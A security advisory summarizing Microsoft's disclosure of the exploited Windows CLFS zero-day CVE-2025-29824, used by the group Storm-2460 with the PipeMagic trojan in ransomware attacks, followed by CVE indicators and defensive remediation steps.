Analysis Summary

Microsoft disclosed that a now-patched Windows zero-day vulnerability, CVE-2025-29824, affecting the Common Log File System (CLFS), was exploited in ransomware attacks against a limited set of targets. These included IT and real estate organizations in the U.S., a financial entity in Venezuela, a Spanish software company, and a retail sector company in Saudi Arabia. CVE-2025-29824 is a privilege escalation flaw that allows attackers to gain SYSTEM privileges and was addressed in Microsoft's April 2025 Patch Tuesday updates.

The attacks are attributed to a threat group Microsoft tracks as Storm-2460. The group used a malware tool called PipeMagic, a plugin-based trojan active since 2022, to deliver the exploit and ransomware payloads. PipeMagic was launched through a malicious MSBuild file containing an encrypted payload. Notably, this is the second zero-day vulnerability delivered via PipeMagic, following CVE-2025-24983, a Win32 Kernel Subsystem bug patched last month.

The exact initial access method is unknown, but the attackers used certutil to download malware from a compromised legitimate site. Exploitation involved targeting the CLFS driver to trigger memory corruption and using the RtlSetAllBits API to escalate privileges, granting full SYSTEM access. Post-exploitation activities included LSASS memory dumping to extract credentials and file encryption using a random extension.

Although Microsoft could not obtain a ransomware sample, the ransom note pointed to a TOR domain linked to the RansomEXX family. The company emphasized that ransomware actors prioritize privilege escalation vulnerabilities like CVE-2025-29824 to convert initial low-level access into full administrative control, enabling rapid ransomware deployment across compromised environments. PipeMagic has previously been associated with Nokoyawa ransomware attacks exploiting another CLFS vulnerability (CVE-2023-28252).

Impact

• Gain Access
• Privilege Escalation
• Credential Theft

Indicators of Compromise

CVE

• CVE-2025-29824

• CVE-2025-24983

• CVE-2023-28252

Remediation

• Apply the official security patch from Microsoft released in April 2025 to fix CVE-2025-29824.
• Upgrade systems to Windows 11 version 24H2 or later, which is not affected by this vulnerability.
• Disable or restrict use of certutil and MSBuild tools in environments where they are not required.
• Monitor for abnormal use of legitimate tools like certutil, especially downloading from unknown URLs.
• Implement application whitelisting to block unauthorized or suspicious executables and scripts.
• Use endpoint detection and response (EDR) solutions to detect exploitation techniques and post-compromise behavior.
• Regularly update antivirus and security tools to recognize and block PipeMagic and related malware.
• Audit and restrict privileges to prevent unauthorized access to SeDebugPrivilege and sensitive system APIs.
• Monitor network traffic for signs of data exfiltration or communication with TOR domains.